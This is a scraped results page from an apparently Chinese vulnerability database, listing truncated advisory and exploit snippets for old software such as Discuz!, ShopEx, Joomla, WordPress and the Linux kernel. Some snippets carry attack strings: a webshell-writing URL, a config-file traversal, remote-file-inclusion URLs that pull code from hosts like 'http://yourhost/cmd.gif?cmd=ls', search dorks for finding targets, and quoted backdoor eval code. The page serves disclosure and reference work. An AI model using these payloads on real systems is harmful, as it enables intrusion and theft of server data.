56796 matches found
Discuz! NT 3.1.0 后台拿webshell
简要描述: 通过后台写入执行代码,直接拿到webshell,从而掌握服务器权限。 详细说明: 1、访问http://127.0.0.1/admin/global/globaltemplatesedit.aspx?path=../tools/&filename=rss.aspx&templateid=1&templatename=Default,写入aspx木马。 2、写入aspx木马后,访问http://127.0.0.1/tools/rss.aspx就可以了。 漏洞证明:...
Microsoft Excel Office Art远程代码执行漏洞(MS11-021)
BUGTRAQ ID: 47226 CVE ID: CVE-2011-0979 Microsoft Excel是由Microsoft为Windows和Apple Macintosh操作系统的电脑而编写和运行的一款试算表软件。 Microsoft Excel在实现上存在缓冲区溢出漏洞,远程攻击者可利用此漏洞以当前用户权限执行任意代码,造成拒绝服务。 Microsoft Office Excel处理特制Excel文件的方式中存在一个远程执行代码漏洞,成功利用此漏洞的攻击者便可完全控制受影响的系统。攻击者可随后安装程序;查看、更改或删除数据;或者创建拥有完全用户权限的新帐户 Microsoft...
Linux Kernel "ldm_frag_add()"缓冲区溢出漏洞
CVECAN ID: CVE-2011-1017 Linux Kernel是开放源码操作系统Linux所使用的内核。 Linux Kernel在LDM分区处理实现上存在缓冲区溢出漏洞,本地攻击者可利用此漏洞控制受影响系统。 此漏洞源于fs/partitions/ldm.c中的"ldmfragadd"函数中的错误,可通过插入具有特制LDM分区的USB设备造成缓冲区溢出。 Linux kernel 2.6.x 厂商补丁: Linux ----- 目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本: http://www.kernel.org/...
PHP "substr_replace()"释放后重用远程内存破坏漏洞
BUGTRAQ ID: 46843 CVE ID: CVE-2011-1148 PHP是广泛使用的通用目的脚本语言,特别适合于Web开发,可嵌入到HTML中。 PHP的"substrreplace"函数在实现上存在释放后重用远程内存破坏漏洞,远程攻击者可利用此漏洞在网络服务器中执行任意代码,造成拒绝服务。 此漏洞源于在将同一个变量多次发送到"substrreplace"函数时,PHP会使该函数中的三个变量使用同一个指针,所以当函数中的类型转换更改了该指针,该指针也会使其他变量无效。 PHP PHP 5.3.x PHP PHP 5.2.x 厂商补丁: PHP ---...
Linux Kernel <= 2.6.37 Local Privilege Escalation
No description provided by source. / Linux Kernel = 2.6.37 local privilege escalation by Dan Rosenberg @djrbliss on twitter Usage: gcc full-nelson.c -o full-nelson ./full-nelson This exploit leverages three vulnerabilities to get root, all of which were discovered by Nelson Elhage: CVE-2010-4258...
Microsoft Office HtmlDlgHelper Class Memory Corruption
No description provided by source. Core Security Technologies - CoreLabs Advisory http://corelabs.coresecurity.com Microsoft Office HtmlDlgHelper class memory corruption 1. Advisory Information Title: Microsoft Office HtmlDlgHelper class memory corruption Advisory Id: CORE-2010-0517 Advisory URL:...
ShopEx的漏洞.
简要描述: 你懂的 详细说明: 看漏洞证明 漏洞证明: url/shopadmin/index.php?ctl=sfile&act=getDB&p0=../../config/config.php 你懂的...
BlueCMS v1.6 sp1 $_SERVER注射漏洞
BlueCMS是一个地方分类信息门户专用CMS系统。 程序在使用getip函数获取客户端ip时没有严格过滤数据,导致sql注射漏洞。 //comment.php $sql = "INSERT INTO ".table'comment'." comid, postid, userid, type, mood, content, pubdate, ip, ischeckVALUES '', '$id', '$userid', '$type', '$mood', '$content', '$timestamp', '".getip."', '$ischeck'"; // 注意getip...
Office Excel OBJ记录解析栈溢出漏洞(MS10-038)
BUGTRAQ ID: 40520 CVE ID: CVE-2010-0822 Excel是微软Office套件中的电子表格工具。 Excel在解析电子表格中的畸形OBJ(recType 0x5D)记录时存在栈溢出漏洞,用户受骗打开了畸形的Excel文档就会导致执行任意代码。 Microsoft Excel 2002 SP3 Microsoft Office 2008 for Mac Microsoft Office 2004 for Mac 临时解决方法: 不要打开从不可信任来源接收到或从可信任来源意外接收到的Excel文件。 厂商补丁: Microsoft ---------...
Mozilla Firefox浏览器强制URL拖放操作权限提升漏洞
CVECAN ID: CVE-2010-0178 Firefox是一款流行的开源WEB浏览器。 浏览器Applet可能错误的将单个鼠标点击动作解释为拖放操作,这可能导致在用户浏览器中非预期的加载资源。攻击者可以连续两次利用这种行为,第一次在用户浏览器中加载特权的chrome: URL,之后在同一文档之上加载恶意的javascript: URL,导致以chrome权限执行任意脚本。 Mozilla Firefox 3.6 Mozilla Firefox 3.5.x Mozilla Firefox 3.0.x Mozilla SeaMonkey 2.0.4 补丁安装方法: 1. 手工安装补丁...
Mozilla Firefox 3.6 window.location对象非授权数据访问漏洞
CVE ID: CVE-2010-0170 Firefox是一款流行的开源WEB浏览器。 由于开发了新的机制来强制窗口与帧之间的同源策略,Firefox 3.6的浏览器引擎将window.location对象更改为正常的可覆盖JavaScript对象。但一些插件也使用这个对象判断页面来源以实施访问限制,因此恶意网页可以通过覆盖这个对象欺骗插件允许到其他站点或本地文件系统上数据的访问。 Mozilla Firefox 3.6 厂商补丁: Mozilla ------- 目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载: http://www.mozilla.org/...
Samba CAP_DAC_OVERRIDE文件权限绕过安全限制漏洞
BUGTRAQ ID: 38606 CVE ID: CVE-2010-0728 Samba是一套实现SMB(Server Messages Block)协议、跨平台进行文件共享和打印共享服务的程序。 如果启用了libcap支持,则所有的smbd进程都继承了CAPDACOVERRIDE功能标记,这允许通过认证的远程用户通过标准的文件系统操作绕过预期的文件权限限制读写访问文件。 Samba Samba 3.5.0 Samba Samba 3.4.6 Samba Samba 3.3.11 厂商补丁: Samba ----- 目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:...
FFmpeg多个媒体文件解析拒绝服务和代码执行漏洞
BUGTRAQ ID: 36465 CVE ID: CVE-2009-4631,CVE-2009-4632,CVE-2009-4633,CVE-2009-4634,CVE-2009-4635,CVE-2009-4636,CVE-2009-4637,CVE-2009-4638,CVE-2009-4639,CVE-2009-4640 FFmpeg是一套对音频和视频进行解码录制转换的完整方案。 ffmpeg解析各种媒体文件时存在多个空指针引用、内存越界或死循环等漏洞,可能导致拒绝服务或执行任意代码。 1 解析AVI、.ogv和.wmv文件时的空指针引用和0除数错误可能导致崩溃。 2...
"Sunbird 0.9 Array Overrun (code execution) 0day"
No description provided by source. full disclosure: http://seclists.org/fulldisclosure/2009/Dec/253 Sunbird 0.9 Array Overrun code execution Author: Maksymilian Arciemowicz and sp3x http://SecurityReason.com Date: - Dis.: 07.05.2009 - Pub.: 11.12.2009 CVE: CVE-2009-0689 CWE: CWE-199 Risk: High...
HP Openview NNM 7.53 Invalid DB Error Code Vulnerability
No description provided by source. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Core Security Technologies - CoreLabs Advisory http://www.coresecurity.com/corelabs/ HP Openview NNM 7.53 Invalid DB Error Code vulnerability 1. Advisory Information Title: HP Openview NNM 7.53 Invalid DB Error Code...
Microsoft Word记录解析栈溢出漏洞(MS09-068)
BUGTRAQ ID: 36950 CVE ID: CVE-2009-3135 Word是微软Office套件中的文件处理工具。 Word处理包含有畸形文件信息块(FIB)结构的特制Word文件的方式中存在栈溢出。成功利用此漏洞的攻击者可以完全控制受影响的系统,攻击者可随后安装程序;查看、更改或删除数据;或者创建拥有完全用户权限的新帐户。那些帐户被配置为拥有较少系统用户权限的用户比具有管理用户权限的用户受到的影响要小。 Microsoft Office 2008 for Mac Microsoft Office 2004 for Mac Microsoft Word Viewer 200...
Apple Mac OS X 2009-006更新修复多个安全漏洞
BUGTRAQ ID: 36956 CVE ID:...
VMware PF异常本地权限提升漏洞
BUGTRAQ ID: 36841 CVECAN ID: CVE-2009-2267 VMWare是一款虚拟PC软件,允许在一台机器上同时运行两个或多个Windows、DOS、LINUX系统。 在受保护的模式中,cpl通常等于cs寄存器最不重要的两位,但也有一个例外:在Virtual-8086模式中,无论cs寄存器为何值cpl总是为 3(最少权限)。当处理器出现PF异常时,会向包含有标记的栈上Push一个异常代码,操作系统使用这个标记确定正确地操作阶段。其中的一个标记为 U/S(user/supervisor),当处理器处于用户态时出现错误会设置这个标记。...
Linux Kernel < 2.6.19 udp_sendmsg Local Root Exploit (x86/x64)
No description provided by source. / second verse, same as the first CVE-2009-2698 udpsendmsg, x86/x64 Cheers to Julien/Tavis for the bug, p0c73n1 for just throwing code at NULL and finding it executed This exploit is a bit more nuanced and thoughtful ; use ./therebel.sh for everything At this...
MySQL Connector/J Unicode字符串SQL注入漏洞
Bugraq ID: 35858 MySQL Connector/J是一款面向java的简单易用的API调用接口。 MySQL Connector/J处理包含部分unicode字符的查询字符串时存在错误,远程攻击者可以利用漏洞通过SQL注入攻击修改应用程序,访问或修改数据。 在设置类似SJIS/Windows-31J字符集而不是UTF-8的情况下,提交包含U+00A5字符的字符串,MySQL Connector/J在处理时可导致SQL注入攻击,攻击者可以获得敏感数据或操作数据库。 MySQL AB MySQL Connector/J 5.1.7 厂商解决方案 MYSQL...
OpenSSL 'dtls1_retrieve_buffered_fragment()' DTLS报文拒绝服务漏洞
Bugraq ID: 35138 CVE ID:CVE-2009-1379 OpenSSL是一款开放源码的SSL实现,用来实现网络通信的高强度加密。 OpenSSL 'dtls1retrievebufferedfragment'存在设计问题,远程攻击者可以利用漏洞对应用程序进行拒绝服务攻击。 当运行: ./openssl sserver -dtls1 -noecdhe -timeout -cert large.pem 并执行如下命令: ./openssl sclient -dtls1 会在客户端触发段错误,GDB显示错误发生在d1both.c:539行: return...
Linux Kernel keyctl_join_session_keyring()函数本地拒绝服务漏洞
BUGTRAQ ID: 33339 CVECAN ID: CVE-2009-0031 Linux Kernel是开放源码操作系统Linux所使用的内核。 Linux Kernel的security/keys/keyctl.c文件中的keyctljoinsessionkeyring函数存在内存泄漏漏洞,本地用户可以利用kfree相关方式耗尽内核内存,导致拒绝服务的情况。 Linux kernel 2.6.x 厂商补丁: Debian ------ Debian已经为此发布了一个安全公告(DSA-1794-1)以及相应补丁: DSA-1794-1:New Linux 2.6.18...
Flatnuke <= 2.7.1 (level) Remote Privilege Escalation Exploit
No description provided by source. !/usr/bin/env perl Flatnuke = 2.7.1 level Privilege Escalation 0-day Exploit Description ----------- Flatnuke contains one flaw that may allow a user to become administrator. The issue is due to 'sections/noneLogin/section.php' script not properly sanitizing use...
MapServer mapserv程序多个远程安全漏洞
BUGTRAQ ID: 34306 CVECAN ID: CVE-2009-0839,CVE-2009-0840,CVE-2009-0841,CVE-2009-0843,CVE-2009-0842,CVE-2009-1176,CVE-2009-1177 MapServer是用于创建交互式地图应用的多平台程序。 MapServer中存在多个安全漏洞,可能允许远程攻击者泄露敏感信息、绕过安全限制、导致拒绝服务或入侵有漏洞的系统。 1 如果远程攻击者向服务器上传了恶意地图文件或通过id参数传送了包含有超过128字节字符串的特制请求的话,就可以在mapserv...
Samba注册表共享名非授权访问漏洞
BUGTRAQ ID: 33118 CVECAN ID: CVE-2009-0022 Samba是一套实现SMB(Server Messages Block)协议、跨平台进行文件共享和打印共享服务的程序。 启用了注册表共享的Samba没有正确地验证共享名,通过认证的攻击者可以通过使用较老版本的smbclient并指定空字符串为共享名(如smbclient //server/ -U user%pass)来访问root文件系统。 Samba 3.2.0 - 3.2.6 临时解决方法: 通过registry shares = no禁用注册表共享。 厂商补丁: Samba -----...
webcamXP URL目录遍历漏洞
BUGTRAQ ID: 32928 webcamXP是一款商业网络摄像头软件,集成了用于共享视频的Web服务器。 webcamXP没有正确地处理URL编码的斜线,远程攻击者可以通过提交恶意URL请求执行目录遍历攻击,读取服务器上的任意文件。 moonware studios webcamXP 5.3.2.410 build 2132 厂商补丁: moonware studios ---------------- 目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本: http://www.webcamxp.com...
UltraEdit FTP/SFTP LIST命令目录遍历漏洞
BUGTRAQ ID: 29784 UltraEdit是HTML、HEX文本和PHP、Perl等编程语言的多用途编辑器。 UltraEdit内置的FTP/SFTP浏览器没有正确地过滤FTP服务器响应LIST命令所返回文件名中的斜线和反斜线。如果用户受骗从服务器下载了整个目录的话,就可能导致向用户机器上的任意位置写入文件。 IDM Computer Solutions UltraEdit 14.00b IDM Computer Solutions ---------------------- 目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:...
XOOPS Module tutorials (printpage.php) SQL Injection Vulnerability
No description provided by source. AUTHOR : S@BUN HOME : http://www.milw0rm.com/author/1334 MA陌L : [email protected] DORKS 1 : allinurl :"/modules/tutorials/" DORK 2 : allinurl :"/modules/tutorials/"tid EXPLOIT 1 :...
boastMachine <= 3.1 (mail.php id) SQL Injection Vulnerability
No description provided by source. ...:::::boastMachine =3.1 SQL Injection Vulnerbility ::::.... Virangar Security Team www.virangar.org www.virangar.net -------- Discoverd By :virangar security teamhadihadi special tnx to:MR.nosrati,black.shadowes,MR.hesy,Zahra & all virangar members & all hacke...
Adobe Flash Player ActiveX控件通用跨站脚本漏洞
Adobe Flash Player是一款流行的FLASH播放程序。 Adobe Flash Player包含的ActiveX控件处理navigateToURL API存在缺陷,远程攻击者可以利用漏洞进行跨站脚本攻击,可获得敏感信息或进行其他攻击。 navigateToURL API函数接收两个参数,URL和要浏览的帧名,SWF动画可在javascript: URI中传递而帧名可是其他域的帧名,这可导致URI执行在其他帧安全上下文中执行,攻击者可以构建恶意WEB页,诱使用户访问来触发。 RedHat Enterprise Linux Supplementary v.5 server...
PHP Helpdesk Login SQL注入漏洞
PHP Helpdesk是一款基于PHP的WEB应用程序。 PHP Helpdesk不正确过滤用户提交的URI数据,远程攻击者可以利用漏洞进行SQL注入攻击,可获得敏感信息或未授权访问应用程序。 问题是由于登录脚本对用户提交的参数缺少过滤,提交恶意SQL查询作为参数数据,可绕过验证未授权访问应用程序。 PHP Helpdesk 0.6.16 目前没有详细解决方案提供: http://phphelpdesk.sourceforge.net/...
Lotus Domino任意访问内存映射文件漏洞
BUGTRAQ ID: 26146 CVECAN ID: CVE-2007-5544 Lotus Domino/Notes服务器是一款基于WEB协同工作的应用程序架构,运行在Linux/Unix和Microsoft Windows操作系统平台下。 Lotus Domino的IPC机制实现上存在漏洞,本地攻击者可能利用此漏洞提升权限。 Lotus Domino的NLNOTES和NTASKLDR间进程间通讯(IPC)机制是通过内存映射的文件执行的,在创建文件时向ACL参数传送了NULL,导致EVERYONE都赋予了完全控制权限。...
RealPlayer ierpplug.dll ActiveX控件播放列表名称栈溢出漏洞
BUGTRAQ ID: 26130 CVECAN ID: CVE-2007-5601 RealPlayer是一款流行的媒体播放器,支持多种媒体格式。 RealPlayer的MPAMedia.dll库所提供的RealPlayer数据库组件在处理播放列表名时存在栈溢出漏洞,远程攻击者可能利用此漏洞控制用户系统。 由于可使用ierpplug.dll所提供的IERPCtl ActiveX控件将本地文件导入到RealPlayer中指定的播放列表,因此如果用户受骗访问了恶意网页并导入了恶意文件的话,就可以触发这个溢出,导致拒绝服务或执行任意指令。 Real Networks RealPlayer 1...
Public Media Manager newstopic_inc.php远程文件包含漏洞
Public Media Manager是一款基于PHP的WEB应用程序。 Public Media Manager不正确过滤用户提交的URI数据,远程攻击者可以利用漏洞以WEB权限执行任意命令。 问题是由于'newstopicinc.php'脚本对用户提交的'indir'参数缺少过滤,指定远程服务器上的任意文件作为包含对象,可导致以以WEB权限执行任意命令。 Public Media Manager Public Media Manager 1.3 目前没有解决方案提供: http://pmm-cms.sourceforge.net/...
XOOPS Module icontent 1.0 Remote File Inclusion Exploit
No description provided by source. html head meta http-equiv="Content-Type" content="text/html; charset=windows-1254" titleXOOPS Module icontent v.1.0 Remote File Inclusion Exploit/title script language="JavaScript"...
MS Internet Explorer <= 7 Remote Arbitrary File Rewrite PoC (MS07-027)
No description provided by source. html title MS07-027 mdsauth.dll NMSA Session Description Object SaveAs control, arbitrary file modification /title body OBJECT id="target" classid="clsid:d4fe6227-1288-11d0-9097-00aa004254a0" /OBJECT script language="vbscript" //next script is converted to UTF16...
Linux Kernel RTA_MAX越界访问漏洞
Linux Kernel是开放源码操作系统Linux所使用的内核。 Linux Kernel代码实现上存在漏洞,本地攻击可能利用此漏洞对系统造成拒绝服务。 Linux内核代码中存在一个错误,将RTAMAX而不是RTNMAX错误地用做了数组的大小,导致dnfibprops(dnfib.c,DECNet)和fibprops(fibsemantics.c,IPv4)函数中可能出现越界访问的情况,造成内核崩溃。 Linux kernel 2.6.21-rc6 目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:...
Joomla! PCLTar.PHP远程文件包含漏洞
Joomla!是一款基于PHP的WEB应用程序。 Joomla!不正确过滤用户提交的输入,远程攻击者可以利用漏洞以WEB权限执行任意命令。 问题是'PCLTar.PHP'脚本对用户提交的'gpcltarlibdir'参数缺少过滤,指定远程服务器上的文件作为包含参数,可导致以WEB权限执行任意命令。 Joomla 1.5.0 Beta 目前没有解决方案提供: http://www.joomla.org/ http://www.example.com/libraries/pcl/pcltar.php?gpcltarlibdir=http://hacker/?...
WEBinsta FM login.php远程文件包含漏洞
WEBinsta FM是一款易用的基于Web的文件管理系统。 WEBinsta FM实现上存在输入验证漏洞,远程攻击者可能利用此漏洞服务器上执行任意命令。 在WEBinsta FM的/admin/login.php文件中: ifisset$COOKIE'adminname' && isset$COOKIE'adminpass' $cusername = $COOKIE'adminname'; $cpassword = $COOKIE'adminpass'; include$absolutepath."admin/checkpass.php";...
Wordpress 2.1.2 (xmlrpc) Remote SQL Injection Exploit
No description provided by source. !/usr/bin/perl -w Wordpress 2.1.2 SQL Injection POC Credits: [email protected] Thanks to ferruh [email protected] improving my exploitation skills website:www.notsosecure.com Wordpress version 2.1.2 is vulnerable to sql injection. This POC works when...
Wordpress 2.1.1远程命令执行后门漏洞
WordPress是一款免费的论坛Blog系统。 WordPress提供软件下载的网站被入侵,入侵者修改了软件代码码植入远程可执行命令的后门,远程攻击者可能利用这个后门以Web进程权限在安装了恶意版本WordPress的服务器上执行任意命令。 被修改的文件是wp-includes/feed.php和wp-includes/theme.php,被添加了如下代码: 在wp-includes/feed.php文件中: function commenttextphpfilter$filterdata eval$filterdata; ... if $GET"ix"...
CA eTrust Security Command Center and eTrust Audit 存在多个漏洞
CA eTrust Security Command Center eSCC和eTrust Audit是CA产品安全命令执行和审核程序。 CA eTrust Security Command Center eSCC和eTrust Audit存在多个安全问题,远程攻击者可以利用漏洞获得敏感信息,执行任意文件删除或者重播攻击。 第一个问题是允许攻击者发现在windows平台上的web服务器路径信息,此漏洞影响eTrust Security Command Center Server 1.0, r8, r8 SP1 CR1, 和r8 SP1 CR2版本。...
Oracle <= 9i / 10g (extproc) Local/Remote Command Execution Exploit
No description provided by source. -- -- $Id: raptororaextproc.sql,v 1.1 2006/12/19 14:21:00 raptor Exp $ -- -- raptororaextproc.sql - command exec via oracle extproc -- Copyright c 2006 Marco Ivaldi [email protected] -- -- Directory traversal vulnerability in extproc in Oracle 9i and 10g --...
AnnoncesV Annonce.PHP远程文件包含漏洞
AnnoncesV是一款基于PHP的WEB应用程序。 AnnoncesV不正确过滤用户提交的URI数据,远程攻击者可以利用漏洞以WEB进程权限执行任意命令。 问题是由于'Annonce.PHP'脚本对用户提交的'cmd'参数缺少过滤,提交恶意的远程服务器作为包含对象,可导致以WEB进程权限执行任意PHP代码。 annoncesV annoncesV 1.1 http://www.comscripts.com/scripts/php.annoncesv.1895.html http://www.example.com/annonce.php?page=yourcode.txt?cmd=id...
PSlash lvc_include_dir远程文件包含漏洞
PSlash是一款基于PHP的WEB应用程序。 PSlash不正确过滤用户提交的URI数据,远程攻击者可以利用漏洞以WEB进程权限执行任意命令。 问题是由于'config.inc.php'脚本对用户提交的'lvcincludedir'参数缺少过滤,提交恶意的远程服务器作为包含对象,可导致以WEB进程权限执行任意PHP代码。 Derek Leung pSlash 0.70 http://www.pslash.com/...
Anti-Spam SMTP Proxy Server未授权文件访问漏洞
Anti-Spam SMTP Proxy Server是一款反垃圾邮件SMTP代理服务器。 Anti-Spam SMTP Proxy Server不正确限制用户的访问,远程攻击者可以利用漏洞访问系统上文件获得敏感信息。 John Hanna Anti-Spam SMTP Proxy ASSP Server 1.2.3 http://assp.sourceforge.net/...
Intel网卡驱动本地权限提升漏洞
Intel Pro 100/1000是英特尔推出的系列网卡设备。 所有的Intel网卡驱动(NDIS miniport驱动)中都存在一个栈溢出漏洞,本地攻击者可能利用此漏洞提升自己在系统中的权限。 尽管NDIS miniport驱动占用的是低层,非特权用户态代码仍可以通过需要由NDIS实现的网卡统计请求与该驱动通讯。如果攻击者能够向\Device\adapterguid发送IOCTLNDISQUERYSELECTEDSTATS 0x17000E请求的话,就会导致NDIS.SYS调用...
pcAnywhere认证拒绝服务漏洞
BUGTRAQ ID: 15646 CVECAN ID: CVE-2005-3934 Symantec pcAnywhere是全球最畅销的用于管理服务器和提供管理人员支持的远程控制解决方案。 pcAnywhere在处理特制消息的时候存在溢出漏洞,可能导致拒绝服务。由于溢出发生在认证之前,因此远程攻击者无需有效的凭据便可利用这个漏洞。 Symantec pcAnywhere 11.5.1 Symantec pcAnywhere 11.0.1 目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:...
Joomla <= 1.0.9 (Weblinks) Remote Blind SQL Injection Exploit
No description provided by source. !/usr/bin/php -q -d shortopentag=on ? echo "Joomla = 1.0.9 'Weblinks' blind SQL injection / admin credentials\r\n"; echo "disclosure exploit benchmark vesion\r\n"; echo "by rgod [email protected]\r\n"; echo "site: http://retrogod.altervista.org\r\n"; if $argc5...
phpBazar <= 2.1.0 Remote (Include/Auth Bypass) Vulnerabilities
No description provided by source. Title: phpBazar = 2.1.0 Multiple vulnerabilites URL: http://www.smartisoft.com/ Dork: inurl:classified.php phpbazar Exploits: -remote file inclusion: /classifiedright.php?languagedir=http://yourhost/cmd.gif?cmd=ls -access to admin login and password:...